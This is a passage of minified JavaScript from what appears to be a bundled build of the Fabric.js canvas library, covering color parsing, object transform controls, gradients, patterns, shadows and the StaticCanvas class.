U=w<=.5?w*(D+1):w+D-w*D,K=2*w-U;x=_(K,U,p+1/3),S=_(K,U,p),O=_(K,U,p-1/3)}return[Math.round(255*x),Math.round(255*S),Math.round(255*O),M[4]?parseFloat(M[4]):1]}},g.Color.fromHsla=b.fromHsl,g.Color.fromHex=function(y){return b.fromSource(b.sourceFromHex(y))},g.Color.sourceFromHex=function(y){if(y.match(b.reHex)){var M=y.slice(y.indexOf("#")+1),p=3===M.length||4===M.length,D=8===M.length||4===M.length,w=p?M.charAt(0)+M.charAt(0):M.substring(0,2),x=p?M.charAt(1)+M.charAt(1):M.substring(2,4),S=p?M.charAt(2)+M.charAt(2):M.substring(4,6),O=D?p?M.charAt(3)+M.charAt(3):M.substring(6,8):"FF";return[parseInt(w,16),parseInt(x,16),parseInt(S,16),parseFloat((parseInt(O,16)/255).toFixed(2))]}},g.Color.fromSource=function(y){var M=new b;return M.setSource(y),M})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=["e","se","s","sw","w","nw","n","ne","e"],_=["ns","nesw","ew","nwse"],y={},M="left",p="top",D="right",w="bottom",x="center",S={top:w,bottom:p,left:D,right:M,center:x},O=g.util.radiansToDegrees,U=Math.sign||function(ze){return(ze>0)-(ze<0)||+ze};function K(ze,me){var Ke=ze.angle+O(Math.atan2(me.y,me.x))+360;return Math.round(Ke%360/45)}function ee(ze,me){var Ke=me.transform.target,rt=Ke.canvas,Ge=g.util.object.clone(me);Ge.target=Ke,rt&&rt.fire("object:"+ze,Ge),Ke.fire(ze,me)}function se(ze,me){var Ke=me.canvas,Ge=ze[Ke.uniScaleKey];return Ke.uniformScaling&&!Ge||!Ke.uniformScaling&&Ge}function ve(ze){return ze.originX===x&&ze.originY===x}function le(ze,me,Ke){var rt=ze.lockScalingX,Ge=ze.lockScalingY;return!!(rt&&Ge||!me&&(rt||Ge)&&Ke||rt&&"x"===me||Ge&&"y"===me)}function v(ze,me,Ke,rt){return{e:ze,transform:me,pointer:{x:Ke,y:rt}}}function P(ze){return function(me,Ke,rt,Ge){var Qe=Ke.target,ht=Qe.getCenterPoint(),mt=Qe.translateToOriginPoint(ht,Ke.originX,Ke.originY),lt=ze(me,Ke,rt,Ge);return Qe.setPositionByOrigin(mt,Ke.originX,Ke.originY),lt}}function G(ze,me){return function(Ke,rt,Ge,Qe){var ht=me(Ke,rt,Ge,Qe);return ht&&ee(ze,v(Ke,rt,Ge,Qe)),ht}}function X(ze,me,Ke,rt,Ge){var Qe=ze.target,ht=Qe.controls[ze.corner],mt=Qe.canvas.getZoom(),lt=Qe.padding/mt,ft=Qe.toLocalPoint(new g.Point(rt,Ge),me,Ke);return ft.x>=lt&&(ft.x-=lt),ft.x<=-lt&&(ft.x+=lt),ft.y>=lt&&(ft.y-=lt),ft.y<=lt&&(ft.y+=lt),ft.x-=ht.offsetX,ft.y-=ht.offsetY,ft}function L(ze){return ze.flipX!==ze.flipY}function h(ze,me,Ke,rt,Ge){if(0!==ze[me]){var Qe=ze._getTransformedDimensions()[rt];ze.set(Ke,Ge/Qe*ze[Ke])}}function R(ze,me,Ke,rt){var ft,Ge=me.target,Qe=Ge._getTransformedDimensions(0,Ge.skewY),ht=X(me,me.originX,me.originY,Ke,rt),mt=Math.abs(2*ht.x)-Qe.x,lt=Ge.skewX;mt<2?ft=0:(ft=O(Math.atan2(mt/Ge.scaleX,Qe.y/Ge.scaleY)),me.originX===M&&me.originY===w&&(ft=-ft),me.originX===D&&me.originY===p&&(ft=-ft),L(Ge)&&(ft=-ft));var xe=lt!==ft;if(xe){var We=Ge._getTransformedDimensions().y;Ge.set("skewX",ft),h(Ge,"skewY","scaleY","y",We)}return xe}function J(ze,me,Ke,rt){var ft,Ge=me.target,Qe=Ge._getTransformedDimensions(Ge.skewX,0),ht=X(me,me.originX,me.originY,Ke,rt),mt=Math.abs(2*ht.y)-Qe.y,lt=Ge.skewY;mt<2?ft=0:(ft=O(Math.atan2(mt/Ge.scaleY,Qe.x/Ge.scaleX)),me.originX===M&&me.originY===w&&(ft=-ft),me.originX===D&&me.originY===p&&(ft=-ft),L(Ge)&&(ft=-ft));var xe=lt!==ft;if(xe){var We=Ge._getTransformedDimensions().x;Ge.set("skewY",ft),h(Ge,"skewX","scaleX","x",We)}return xe}function Ae(ze,me,Ke,rt,Ge){var ft,xe,We,Je,Le,$e,Qe=me.target,ht=Qe.lockScalingX,mt=Qe.lockScalingY,lt=(Ge=Ge||{}).by,Oe=se(ze,Qe),Te=le(Qe,lt,Oe),st=me.gestureScale;if(Te)return!1;if(st)xe=me.scaleX*st,We=me.scaleY*st;else{if(ft=X(me,me.originX,me.originY,Ke,rt),Le="y"!==lt?U(ft.x):1,$e="x"!==lt?U(ft.y):1,me.signX||(me.signX=Le),me.signY||(me.signY=$e),Qe.lockScalingFlip&&(me.signX!==Le||me.signY!==$e))return!1;if(Je=Qe._getTransformedDimensions(),Oe&&!lt){var xt=Math.abs(ft.x)+Math.abs(ft.y),pt=me.original,Wi=xt/(Math.abs(Je.x*pt.scaleX/Qe.scaleX)+Math.abs(Je.y*pt.scaleY/Qe.scaleY));xe=pt.scaleX*Wi,We=pt.scaleY*Wi}else xe=Math.abs(ft.x*Qe.scaleX/Je.x),We=Math.abs(ft.y*Qe.scaleY/Je.y);ve(me)&&(xe*=2,We*=2),me.signX!==Le&&"y"!==lt&&(me.originX=S[me.originX],xe*=-1,me.signX=Le),me.signY!==$e&&"x"!==lt&&(me.originY=S[me.originY],We*=-1,me.signY=$e)}var Ft=Qe.scaleX,zt=Qe.scaleY;return lt?("x"===lt&&Qe.set("scaleX",xe),"y"===lt&&Qe.set("scaleY",We)):(!ht&&Qe.set("scaleX",xe),!mt&&Qe.set("scaleY",We)),Ft!==Qe.scaleX||zt!==Qe.scaleY}y.scaleCursorStyleHandler=function ye(ze,me,Ke){var Ge=se(ze,Ke),Qe="";if(0!==me.x&&0===me.y?Qe="x":0===me.x&&0!==me.y&&(Qe="y"),le(Ke,Qe,Ge))return"not-allowed";var ht=K(Ke,me);return b[ht]+"-resize"},y.skewCursorStyleHandler=function z(ze,me,Ke){if(0!==me.x&&Ke.lockSkewingY||0!==me.y&&Ke.lockSkewingX)return"not-allowed";var Ge=K(Ke,me)%4;return _[Ge]+"-resize"},y.scaleSkewCursorStyleHandler=function l(ze,me,Ke){return ze[Ke.canvas.altActionKey]?y.skewCursorStyleHandler(ze,me,Ke):y.scaleCursorStyleHandler(ze,me,Ke)},y.rotationWithSnapping=G("rotating",P(function Ie(ze,me,Ke,rt){var Ge=me,Qe=Ge.target,ht=Qe.translateToOriginPoint(Qe.getCenterPoint(),Ge.originX,Ge.originY);if(Qe.lockRotation)return!1;var xe,mt=Math.atan2(Ge.ey-ht.y,Ge.ex-ht.x),lt=Math.atan2(rt-ht.y,Ke-ht.x),ft=O(lt-mt+Ge.theta);if(Qe.snapAngle>0){var We=Qe.snapAngle,Je=Qe.snapThreshold||We,Oe=Math.ceil(ft/We)*We,Te=Math.floor(ft/We)*We;Math.abs(ft-Te)<Je?ft=Te:Math.abs(ft-Oe)<Je&&(ft=Oe)}return ft<0&&(ft=360+ft),xe=Qe.angle!==(ft%=360),Qe.angle=ft,xe})),y.scalingEqually=G("scaling",P(function Ue(ze,me,Ke,rt){return Ae(ze,me,Ke,rt)})),y.scalingX=G("scaling",P(function Xe(ze,me,Ke,rt){return Ae(ze,me,Ke,rt,{by:"x"})})),y.scalingY=G("scaling",P(function He(ze,me,Ke,rt){return Ae(ze,me,Ke,rt,{by:"y"})})),y.scalingYOrSkewingX=function Be(ze,me,Ke,rt){return ze[me.target.canvas.altActionKey]?y.skewHandlerX(ze,me,Ke,rt):y.scalingY(ze,me,Ke,rt)},y.scalingXOrSkewingY=function qe(ze,me,Ke,rt){return ze[me.target.canvas.altActionKey]?y.skewHandlerY(ze,me,Ke,rt):y.scalingX(ze,me,Ke,rt)},y.changeWidth=G("resizing",P(function De(ze,me,Ke,rt){var Ge=me.target,Qe=X(me,me.originX,me.originY,Ke,rt),ht=Ge.strokeWidth/(Ge.strokeUniform?Ge.scaleX:1),mt=ve(me)?2:1,lt=Ge.width,ft=Math.abs(Qe.x*mt/Ge.scaleX)-ht;return Ge.set("width",Math.max(ft,0)),lt!==ft})),y.skewHandlerX=function Z(ze,me,Ke,rt){var ht,Ge=me.target,Qe=Ge.skewX,mt=me.originY;return!Ge.lockSkewingX&&(0===Qe?ht=X(me,x,x,Ke,rt).x>0?M:D:(Qe>0&&(ht=mt===p?M:D),Qe<0&&(ht=mt===p?D:M),L(Ge)&&(ht=ht===M?D:M)),me.originX=ht,G("skewing",P(R))(ze,me,Ke,rt))},y.skewHandlerY=function ue(ze,me,Ke,rt){var ht,Ge=me.target,Qe=Ge.skewY,mt=me.originX;return!Ge.lockSkewingY&&(0===Qe?ht=X(me,x,x,Ke,rt).y>0?p:w:(Qe>0&&(ht=mt===M?p:w),Qe<0&&(ht=mt===M?w:p),L(Ge)&&(ht=ht===p?w:p)),me.originY=ht,G("skewing",P(J))(ze,me,Ke,rt))},y.dragHandler=function Ve(ze,me,Ke,rt){var Ge=me.target,Qe=Ke-me.offsetX,ht=rt-me.offsetY,mt=!Ge.get("lockMovementX")&&Ge.left!==Qe,lt=!Ge.get("lockMovementY")&&Ge.top!==ht;return mt&&Ge.set("left",Qe),lt&&Ge.set("top",ht),(mt||lt)&&ee("moving",v(ze,me,Ke,rt)),mt||lt},y.scaleOrSkewActionName=function f(ze,me,Ke){var rt=ze[Ke.canvas.altActionKey];return 0===me.x?rt?"skewX":"scaleY":0===me.y?rt?"skewY":"scaleX":void 0},y.rotationStyleHandler=function A(ze,me,Ke){return Ke.lockRotation?"not-allowed":me.cursorStyle},y.fireEvent=ee,y.wrapWithFixedAnchor=P,y.wrapWithFireEvent=G,y.getLocalPoint=X,g.controlsUtils=y}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.degreesToRadians,_=g.controlsUtils;_.renderCircleControl=function y(p,D,w,x,S){x=x||{};var ye,O=this.sizeX||x.cornerSize||S.cornerSize,U=this.sizeY||x.cornerSize||S.cornerSize,K=void 0!==x.transparentCorners?x.transparentCorners:S.transparentCorners,ee=K?"stroke":"fill",se=!K&&(x.cornerStrokeColor||S.cornerStrokeColor),ve=D,le=w;p.save(),p.fillStyle=x.cornerColor||S.cornerColor,p.strokeStyle=x.cornerStrokeColor||S.cornerStrokeColor,O>U?(ye=O,p.scale(1,U/O),le=w*O/U):U>O?(ye=U,p.scale(O/U,1),ve=D*U/O):ye=O,p.lineWidth=1,p.beginPath(),p.arc(ve,le,ye/2,0,2*Math.PI,!1),p[ee](),se&&p.stroke(),p.restore()},_.renderSquareControl=function M(p,D,w,x,S){x=x||{};var O=this.sizeX||x.cornerSize||S.cornerSize,U=this.sizeY||x.cornerSize||S.cornerSize,K=void 0!==x.transparentCorners?x.transparentCorners:S.transparentCorners,ee=K?"stroke":"fill",se=!K&&(x.cornerStrokeColor||S.cornerStrokeColor),ve=O/2,le=U/2;p.save(),p.fillStyle=x.cornerColor||S.cornerColor,p.strokeStyle=x.cornerStrokeColor||S.cornerStrokeColor,p.lineWidth=1,p.translate(D,w),p.rotate(b(S.angle)),p[ee+"Rect"](-ve,-le,O,U),se&&p.strokeRect(-ve,-le,O,U),p.restore()}}(we),function(E){"use strict";var g=E.fabric||(E.fabric={});g.Control=function b(_){for(var y in _)this[y]=_[y]},g.Control.prototype={visible:!0,actionName:"scale",angle:0,x:0,y:0,offsetX:0,offsetY:0,sizeX:null,sizeY:null,touchSizeX:null,touchSizeY:null,cursorStyle:"crosshair",withConnection:!1,actionHandler:function(){},mouseDownHandler:function(){},mouseUpHandler:function(){},getActionHandler:function(){return this.actionHandler},getMouseDownHandler:function(){return this.mouseDownHandler},getMouseUpHandler:function(){return this.mouseUpHandler},cursorStyleHandler:function(_,y){return y.cursorStyle},getActionName:function(_,y){return y.actionName},getVisibility:function(_,y){var M=_._controlsVisibility;return M&&void 0!==M[y]?M[y]:this.visible},setVisibility:function(_){this.visible=_},positionHandler:function(_,y){return g.util.transformPoint({x:this.x*_.x+this.offsetX,y:this.y*_.y+this.offsetY},y)},calcCornerCoords:function(_,y,M,p,D){var w,x,S,O,U=D?this.touchSizeX:this.sizeX,K=D?this.touchSizeY:this.sizeY;if(U&&K&&U!==K){var ee=Math.atan2(K,U),se=Math.sqrt(U*U+K*K)/2,ve=ee-g.util.degreesToRadians(_),le=Math.PI/2-ee-g.util.degreesToRadians(_);w=se*g.util.cos(ve),x=se*g.util.sin(ve),S=se*g.util.cos(le),O=se*g.util.sin(le)}else se=.7071067812*(U&&K?U:y),ve=g.util.degreesToRadians(45-_),w=S=se*g.util.cos(ve),x=O=se*g.util.sin(ve);return{tl:{x:M-O,y:p-S},tr:{x:M+w,y:p-x},bl:{x:M-w,y:p+x},br:{x:M+O,y:p+S}}},render:function(_,y,M,p,D){"circle"===((p=p||{}).cornerStyle||D.cornerStyle)?g.controlsUtils.renderCircleControl.call(this,_,y,M,p,D):g.controlsUtils.renderSquareControl.call(this,_,y,M,p,D)}}}(we),function(){function E(M,p){var x,S,O,U,D=M.getAttribute("style"),w=M.getAttribute("offset")||0;if(w=(w=parseFloat(w)/(/%$/.test(w)?100:1))<0?0:w>1?1:w,D){var K=D.split(/\s*;\s*/);for(""===K[K.length-1]&&K.pop(),U=K.length;U--;){var ee=K[U].split(/\s*:\s*/),se=ee[0].trim(),ve=ee[1].trim();"stop-color"===se?x=ve:"stop-opacity"===se&&(O=ve)}}return x||(x=M.getAttribute("stop-color")||"rgb(0,0,0)"),O||(O=M.getAttribute("stop-opacity")),S=(x=new j.Color(x)).getAlpha(),O=isNaN(parseFloat(O))?1:parseFloat(O),O*=S*p,{offset:w,color:x.toRgb(),opacity:O}}var _=j.util.object.clone;j.Gradient=j.util.createClass({offsetX:0,offsetY:0,gradientTransform:null,gradientUnits:"pixels",type:"linear",initialize:function(M){M||(M={}),M.coords||(M.coords={});var p,D=this;Object.keys(M).forEach(function(w){D[w]=M[w]}),this.id?this.id+="_"+j.Object.__uid++:this.id=j.Object.__uid++,p={x1:M.coords.x1||0,y1:M.coords.y1||0,x2:M.coords.x2||0,y2:M.coords.y2||0},"radial"===this.type&&(p.r1=M.coords.r1||0,p.r2=M.coords.r2||0),this.coords=p,this.colorStops=M.colorStops.slice()},addColorStop:function(M){for(var p in M){var D=new j.Color(M[p]);this.colorStops.push({offset:parseFloat(p),color:D.toRgb(),opacity:D.getAlpha()})}return this},toObject:function(M){var p={type:this.type,coords:this.coords,colorStops:this.colorStops,offsetX:this.offsetX,offsetY:this.offsetY,gradientUnits:this.gradientUnits,gradientTransform:this.gradientTransform?this.gradientTransform.concat():this.gradientTransform};return j.util.populateWithProperties(this,p,M),p},toSVG:function(M,S){var w,x,O,U,D=_(this.coords,!0),K=(S=S||{},_(this.colorStops,!0)),ee=D.r1>D.r2,se=this.gradientTransform?this.gradientTransform.concat():j.iMatrix.concat(),ve=-this.offsetX,le=-this.offsetY,ye=!!S.additionalTransform,z="pixels"===this.gradientUnits?"userSpaceOnUse":"objectBoundingBox";if(K.sort(function(P,G){return P.offset-G.offset}),"objectBoundingBox"===z?(ve/=M.width,le/=M.height):(ve+=M.width/2,le+=M.height/2),"path"===M.type&&"percentage"!==this.gradientUnits&&(ve-=M.pathOffset.x,le-=M.pathOffset.y),se[4]-=ve,se[5]-=le,U='id="SVGID_'+this.id+'" gradientUnits="'+z+'"',U+=' gradientTransform="'+(ye?S.additionalTransform+" ":"")+j.util.matrixToSVG(se)+'" ',"linear"===this.type?O=["<linearGradient ",U,' x1="',D.x1,'" y1="',D.y1,'" x2="',D.x2,'" y2="',D.y2,'">\n']:"radial"===this.type&&(O=["<radialGradient ",U,' cx="',ee?D.x1:D.x2,'" cy="',ee?D.y1:D.y2,'" r="',ee?D.r1:D.r2,'" fx="',ee?D.x2:D.x1,'" fy="',ee?D.y2:D.y1,'">\n']),"radial"===this.type){if(ee)for((K=K.concat()).reverse(),w=0,x=K.length;w<x;w++)K[w].offset=1-K[w].offset;var l=Math.min(D.r1,D.r2);if(l>0){var A=l/Math.max(D.r1,D.r2);for(w=0,x=K.length;w<x;w++)K[w].offset+=A*(1-K[w].offset)}}for(w=0,x=K.length;w<x;w++){var v=K[w];O.push("<stop ",'offset="',100*v.offset+"%",'" style="stop-color:',v.color,void 0!==v.opacity?";stop-opacity: "+v.opacity:";",'"/>\n')}return O.push("linear"===this.type?"</linearGradient>\n":"</radialGradient>\n"),O.join("")},toLive:function(M){var p,w,x,D=j.util.object.clone(this.coords);if(this.type){for("linear"===this.type?p=M.createLinearGradient(D.x1,D.y1,D.x2,D.y2):"radial"===this.type&&(p=M.createRadialGradient(D.x1,D.y1,D.r1,D.x2,D.y2,D.r2)),w=0,x=this.colorStops.length;w<x;w++){var S=this.colorStops[w].color,O=this.colorStops[w].opacity,U=this.colorStops[w].offset;void 0!==O&&(S=new j.Color(S).setAlpha(O).toRgba()),p.addColorStop(U,S)}return p}}}),j.util.object.extend(j.Gradient,{fromElement:function(M,p,D,w){var x=parseFloat(D)/(/%$/.test(D)?100:1);x=x<0?0:x>1?1:x,isNaN(x)&&(x=1);var O,se,ve,z,S=M.getElementsByTagName("stop"),U="userSpaceOnUse"===M.getAttribute("gradientUnits")?"pixels":"percentage",K=M.getAttribute("gradientTransform")||"",ee=[],le=0,ye=0;for("linearGradient"===M.nodeName||"LINEARGRADIENT"===M.nodeName?(O="linear",se=function g(M){return{x1:M.getAttribute("x1")||0,y1:M.getAttribute("y1")||0,x2:M.getAttribute("x2")||"100%",y2:M.getAttribute("y2")||0}}(M)):(O="radial",se=function b(M){return{x1:M.getAttribute("fx")||M.getAttribute("cx")||"50%",y1:M.getAttribute("fy")||M.getAttribute("cy")||"50%",r1:0,x2:M.getAttribute("cx")||"50%",y2:M.getAttribute("cy")||"50%",r2:M.getAttribute("r")||"50%"}}(M)),ve=S.length;ve--;)ee.push(E(S[ve],x));return z=j.parseTransformAttribute(K),function y(M,p,D,w){var x,S;Object.keys(p).forEach(function(O){"Infinity"===(x=p[O])?S=1:"-Infinity"===x?S=0:(S=parseFloat(p[O],10),"string"==typeof x&&/^(\d+\.\d+)%|(\d+)%$/.test(x)&&(S*=.01,"pixels"===w&&(("x1"===O||"x2"===O||"r2"===O)&&(S*=D.viewBoxWidth||D.width),("y1"===O||"y2"===O)&&(S*=D.viewBoxHeight||D.height)))),p[O]=S})}(0,se,w,U),"pixels"===U&&(le=-p.left,ye=-p.top),new j.Gradient({id:M.getAttribute("id"),type:O,coords:se,colorStops:ee,gradientUnits:U,gradientTransform:z,offsetX:le,offsetY:ye})}})}(),function(){"use strict";var E=j.util.toFixed;j.Pattern=j.util.createClass({repeat:"repeat",offsetX:0,offsetY:0,crossOrigin:"",patternTransform:null,initialize:function(g,b){if(g||(g={}),this.id=j.Object.__uid++,this.setOptions(g),!g.source||g.source&&"string"!=typeof g.source)b&&b(this);else{var _=this;this.source=j.util.createImage(),j.util.loadImage(g.source,function(y,M){_.source=y,b&&b(_,M)},null,this.crossOrigin)}},toObject:function(g){var _,y,b=j.Object.NUM_FRACTION_DIGITS;return"string"==typeof this.source.src?_=this.source.src:"object"==typeof this.source&&this.source.toDataURL&&(_=this.source.toDataURL()),y={type:"pattern",source:_,repeat:this.repeat,crossOrigin:this.crossOrigin,offsetX:E(this.offsetX,b),offsetY:E(this.offsetY,b),patternTransform:this.patternTransform?this.patternTransform.concat():null},j.util.populateWithProperties(this,y,g),y},toSVG:function(g){var b="function"==typeof this.source?this.source():this.source,_=b.width/g.width,y=b.height/g.height,M=this.offsetX/g.width,p=this.offsetY/g.height,D="";return("repeat-x"===this.repeat||"no-repeat"===this.repeat)&&(y=1,p&&(y+=Math.abs(p))),("repeat-y"===this.repeat||"no-repeat"===this.repeat)&&(_=1,M&&(_+=Math.abs(M))),b.src?D=b.src:b.toDataURL&&(D=b.toDataURL()),'<pattern id="SVGID_'+this.id+'" x="'+M+'" y="'+p+'" width="'+_+'" height="'+y+'">\n<image x="0" y="0" width="'+b.width+'" height="'+b.height+'" xlink:href="'+D+'"></image>\n</pattern>\n'},setOptions:function(g){for(var b in g)this[b]=g[b]},toLive:function(g){var b=this.source;return b&&(void 0===b.src||b.complete&&0!==b.naturalWidth&&0!==b.naturalHeight)?g.createPattern(b,this.repeat):""}})}(),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.toFixed;g.Shadow?g.warn("fabric.Shadow is already defined."):(g.Shadow=g.util.createClass({color:"rgb(0,0,0)",blur:0,offsetX:0,offsetY:0,affectStroke:!1,includeDefaultValues:!0,nonScaling:!1,initialize:function(_){for(var y in"string"==typeof _&&(_=this._parseShadow(_)),_)this[y]=_[y];this.id=g.Object.__uid++},_parseShadow:function(_){var y=_.trim(),M=g.Shadow.reOffsetsAndBlur.exec(y)||[];return{color:(y.replace(g.Shadow.reOffsetsAndBlur,"")||"rgb(0,0,0)").trim(),offsetX:parseFloat(M[1],10)||0,offsetY:parseFloat(M[2],10)||0,blur:parseFloat(M[3],10)||0}},toString:function(){return[this.offsetX,this.offsetY,this.blur,this.color].join("px ")},toSVG:function(_){var y=40,M=40,p=g.Object.NUM_FRACTION_DIGITS,D=g.util.rotateVector({x:this.offsetX,y:this.offsetY},g.util.degreesToRadians(-_.angle)),x=new g.Color(this.color);return _.width&&_.height&&(y=100*b((Math.abs(D.x)+this.blur)/_.width,p)+20,M=100*b((Math.abs(D.y)+this.blur)/_.height,p)+20),_.flipX&&(D.x*=-1),_.flipY&&(D.y*=-1),'<filter id="SVGID_'+this.id+'" y="-'+M+'%" height="'+(100+2*M)+'%" x="-'+y+'%" width="'+(100+2*y)+'%" >\n\t<feGaussianBlur in="SourceAlpha" stdDeviation="'+b(this.blur?this.blur/2:0,p)+'"></feGaussianBlur>\n\t<feOffset dx="'+b(D.x,p)+'" dy="'+b(D.y,p)+'" result="oBlur" ></feOffset>\n\t<feFlood flood-color="'+x.toRgb()+'" flood-opacity="'+x.getAlpha()+'"/>\n\t<feComposite in2="oBlur" operator="in" />\n\t<feMerge>\n\t\t<feMergeNode></feMergeNode>\n\t\t<feMergeNode in="SourceGraphic"></feMergeNode>\n\t</feMerge>\n</filter>\n'},toObject:function(){if(this.includeDefaultValues)return{color:this.color,blur:this.blur,offsetX:this.offsetX,offsetY:this.offsetY,affectStroke:this.affectStroke,nonScaling:this.nonScaling};var _={},y=g.Shadow.prototype;return["color","blur","offsetX","offsetY","affectStroke","nonScaling"].forEach(function(M){this[M]!==y[M]&&(_[M]=this[M])},this),_}}),g.Shadow.reOffsetsAndBlur=/(?:\s|^)(-?\d+(?:\.\d*)?(?:px)?(?:\s?|$))?(-?\d+(?:\.\d*)?(?:px)?(?:\s?|$))?(\d+(?:\.\d*)?(?:px)?)?(?:\s?|$)(?:$|\s)/)}(we),function(){"use strict";if(j.StaticCanvas)j.warn("fabric.StaticCanvas is already defined.");else{var E=j.util.object.extend,g=j.util.getElementOffset,b=j.util.removeFromArray,_=j.util.toFixed,y=j.util.transformPoint,M=j.util.invertTransform,p=j.util.getNodeCanvas,D=j.util.createCanvasElement,w=new Error("Could not initialize `canvas` element");j.StaticCanvas=j.util.createClass(j.CommonMethods,{initialize:function(x,S){S||(S={}),this.renderAndResetBound=this.renderAndReset.bind(this),this.requestRenderAllBound=this.requestRenderAll.bind(this),this._initStatic(x,S)},backgroundColor:"",backgroundImage:null,overlayColor:"",overlayImage:null,includeDefaultValues:!0,stateful:!1,renderOnAddRemove:!0,controlsAboveOverlay:!1,allowTouchScrolling:!1,imageSmoothingEnabled:!0,viewportTransform:j.iMatrix.concat(),backgroundVpt:!0,overlayVpt:!0,enableRetinaScaling:!0,vptCoords:{},skipOffscreen:!0,clipPath:void 0,_initStatic:function(x,S){var O=this.requestRenderAllBound;this._objects=[],this._createLowerCanvas(x),this._initOptions(S),this.interactive||this._initRetinaScaling(),S.overlayImage&&this.setOverlayImage(S.overlayImage,O),S.backgroundImage&&this.setBackgroundImage(S.backgroundImage,O),S.backgroundColor&&this.setBackgroundColor(S.backgroundColor,O),S.overlayColor&&this.setOverlayColor(S.overlayColor,O),this.calcOffset()},_isRetinaScaling:function(){return j.devicePixelRatio>1&&this.enableRetinaScaling},getRetinaScaling:function(){return this._isRetinaScaling()?Math.max(1,j.devicePixelRatio):1},_initRetinaScaling:function(){if(this._isRetinaScaling()){var x=j.devicePixelRatio;this.__initRetinaScaling(x,this.lowerCanvasEl,this.contextContainer),this.upperCanvasEl&&this.__initRetinaScaling(x,this.upperCanvasEl,this.contextTop)}},__initRetinaScaling:function(x,S,O){S.setAttribute("width",this.width*x),S.setAttribute("height",this.height*x),O.scale(x,x)},calcOffset:function(){return this._offset=g(this.lowerCanvasEl),this},setOverlayImage:function(x,S,O){return this.__setBgOverlayImage("overlayImage",x,S,O)},setBackgroundImage:function(x,S,O){return this.__setBgOverlayImage("backgroundImage",x,S,O)},setOverlayColor:function(x,S){return this.__setBgOverlayColor("overlayColor",x,S)},setBackgroundColor:function(x,S){return this.__setBgOverlayColor("backgroundColor",x,S)},__setBgOverlayImage:function(x,S,O,U){return"string"==typeof S?j.util.loadImage(S,function(K,ee){if(K){var se=new j.Image(K,U);this[x]=se,se.canvas=this}O&&O(K,ee)},this,U&&U.crossOrigin):(U&&S.setOptions(U),this[x]=S,S&&(S.canvas=this),O&&O(S,!1)),this},__setBgOverlayColor:function(x,S,O){return this[x]=S,this._initGradient(S,x),this._initPattern(S,x,O),this},_createCanvasElement:function(){var x=D();if(!x||(x.style||(x.style={}),void 0===x.getContext))throw w;return x},_initOptions:function(x){var S=this.lowerCanvasEl;this._setOptions(x),this.width=this.width||parseInt(S.width,10)||0,this.height=this.height||parseInt(S.height,10)||0,this.lowerCanvasEl.style&&(S.width=this.width,S.height=this.height,S.style.width=this.width+"px",S.style.height=this.height+"px",this.viewportTransform=this.viewportTransform.slice())},_createLowerCanvas:function(x){this.lowerCanvasEl=x&&x.getContext?x:j.util.getById(x)||this._createCanvasElement(),j.util.addClass(this.lowerCanvasEl,"lower-canvas"),this._originalCanvasStyle=this.lowerCanvasEl.style,this.interactive&&this._applyCanvasStyle(this.lowerCanvasEl),this.contextContainer=this.lowerCanvasEl.getContext("2d")},getWidth:function(){return this.width},getHeight:function(){return this.height},setWidth:function(x,S){return this.setDimensions({width:x},S)},setHeight:function(x,S){return this.setDimensions({height:x},S)},setDimensions:function(x,S){var O;for(var U in S=S||{},x)O=x[U],S.cssOnly||(this._setBackstoreDimension(U,x[U]),O+="px",this.hasLostContext=!0),S.backstoreOnly||this._setCssDimension(U,O);return this._isCurrentlyDrawing&&this.freeDrawingBrush&&this.freeDrawingBrush._setBrushStyles(this.contextTop),this._initRetinaScaling(),this.calcOffset(),S.cssOnly||this.requestRenderAll(),this},_setBackstoreDimension:function(x,S){return this.lowerCanvasEl[x]=S,this.upperCanvasEl&&(this.upperCanvasEl[x]=S),this.cacheCanvasEl&&(this.cacheCanvasEl[x]=S),this[x]=S,this},_setCssDimension:function(x,S){return this.lowerCanvasEl.style[x]=S,this.upperCanvasEl&&(this.upperCanvasEl.style[x]=S),this.wrapperEl&&(this.wrapperEl.style[x]=S),this},getZoom:function(){return this.viewportTransform[0]},setViewportTransform:function(x){var K,ee,se,S=this._activeObject,O=this.backgroundImage,U=this.overlayImage;for(this.viewportTransform=x,ee=0,se=this._objects.length;ee<se;ee++)(K=this._objects[ee]).group||K.setCoords(!0);return S&&S.setCoords(),O&&O.setCoords(!0),U&&U.setCoords(!0),this.calcViewportBoundaries(),this.renderOnAddRemove&&this.requestRenderAll(),this},zoomToPoint:function(x,S){var O=x,U=this.viewportTransform.slice(0);x=y(x,M(this.viewportTransform)),U[0]=S,U[3]=S;var K=y(x,U);return U[4]+=O.x-K.x,U[5]+=O.y-K.y,this.setViewportTransform(U)},setZoom:function(x){return this.zoomToPoint(new j.Point(0,0),x),this},absolutePan:function(x){var S=this.viewportTransform.slice(0);return S[4]=-x.x,S[5]=-x.y,this.setViewportTransform(S)},relativePan:function(x){return this.absolutePan(new j.Point(-x.x-this.viewportTransform[4],-x.y-this.viewportTransform[5]))},getElement:function(){return this.lowerCanvasEl},_onObjectAdded:function(x){this.stateful&&x.setupState(),x._set("canvas",this),x.setCoords(),this.fire("object:added",{target:x}),x.fire("added")},_onObjectRemoved:function(x){this.fire("object:removed",{target:x}),x.fire("removed"),delete x.canvas},clearContext:function(x){return x.clearRect(0,0,this.width,this.height),this},getContext:function(){return this.contextContainer},clear:function(){return this.remove.apply(this,this.getObjects()),this.backgroundImage=null,this.overlayImage=null,this.backgroundColor="",this.overlayColor="",this._hasITextHandlers&&(this.off("mouse:up",this._mouseUpITextHandler),this._iTextInstances=null,this._hasITextHandlers=!1),this.clearContext(this.contextContainer),this.fire("canvas:cleared"),this.renderOnAddRemove&&this.requestRenderAll(),this},renderAll:function(){return this.renderCanvas(this.contextContainer,this._objects),this},renderAndReset:function(){this.isRendering=0,this.renderAll()},requestRenderAll:function(){return this.isRendering||(this.isRendering=j.util.requestAnimFrame(this.renderAndResetBound)),this},calcViewportBoundaries:function(){var x={},S=this.width,O=this.height,U=M(this.viewportTransform);return x.tl=y({x:0,y:0},U),x.br=y({x:S,y:O},U),x.tr=new j.Point(x.br.x,x.tl.y),x.bl=new j.Point(x.tl.x,x.br.y),this.vptCoords=x,x},cancelRequestedRender:function(){this.isRendering&&(j.util.cancelAnimFrame(this.isRendering),this.isRendering=0)},renderCanvas:function(x,S){var 